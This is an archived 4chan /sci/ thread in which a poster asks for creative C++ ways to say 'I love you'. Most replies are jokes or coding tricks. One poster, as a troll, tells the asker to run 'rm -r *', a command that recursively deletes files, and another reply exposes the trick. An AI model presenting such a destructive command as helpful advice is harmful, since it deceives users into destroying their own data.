[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

c++

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 22
Thread images: 2

File: h.png (35KB, 512x512px) Image search: [Google]
h.png
35KB, 512x512px
How can i code ways to say I LOVE YOU in c++, something more creative and funny that just
cout << "i love you" << endl;
>>
>>8882618
Write a brainfuck interpreter and give it this:

[code]-[------->+<]>.-[->++++<]>.++[--->++<]>.+++.+++++++.+[->+++<]>.--[--->+<]>-.--[->++++<]>+.----------.++++++.-[++>---<]>.[/code]

Then tell her you want to fuck her brain.
>>
https://en.wikipedia.org/wiki/Obfuscation_(software)
>>
>>8882618
>>>/g/
Programming is not science.
>>
File: 1493416073443.gif (2MB, 320x240px) Image search: [Google]
1493416073443.gif
2MB, 320x240px
>>8882645
>>
>>8882618
Port this
https://en.wikipedia.org/wiki/ILOVEYOU
>>
>>8882618
You could at least let the console print it letter by letter. Get the text from a file, split the lines into chars and then make breaks between the printout with usleep or so.
>>
You can state an inequality with the variables i and u, such that when solved it looks like
i<3u
works 9.9999/10 times with normies
>>
>>8883586
>Solves to 3u>i
"Okay anon I finished your stupid math question, what was the point again?"
>>
>>8883616
well if they dont see it when having this solution you just stop caring cause they are too stupid
>>
>>8882618
Write every character as its ASCII code with a bit shift and output everything as a stream in cout while unshifting and casting the numbers as chars at the same time. It will be hard to read because the bit shift and stream operator are the same.
>>
>>8882618
FUCK OFF NORMIE REEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
>>
>>8882655
does anyone have the source for this?
>>
>>8883896
SICP first lecture

>ya dip!
>>
>>8882618

If you are on a mac, open the terminal (it can be found in applications->utilities->terminal).

then type:

rm *

next type:

gcc -o I LOVE YOU
>>
>>8883947

sorry, I screwed up the first command, should be:

rm -r *
>>
>>8883947
Thx anon but i have a pc
>>
>>8883962

whelp, in that case you don't need my help since you're already fucked
>>
>>8883947
>>8883952
>rm -r *

I'm new to /sci/, so I can't tell if people can tell this guy is a troll or not.

But FYI "rm" means remove, "-r" flag stands for doing it recursively, "*" means do that for everything.
>>
>>8882618

Nobody is gonna help you on your pathetic quest to get stacy to fuck you through C++
>>
use assembly? C++ supports inline assembly.
>>
>>8883947
>>8883952
>>8883977
>>8884034
>>>/g/
Thread posts: 22
Thread images: 2

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.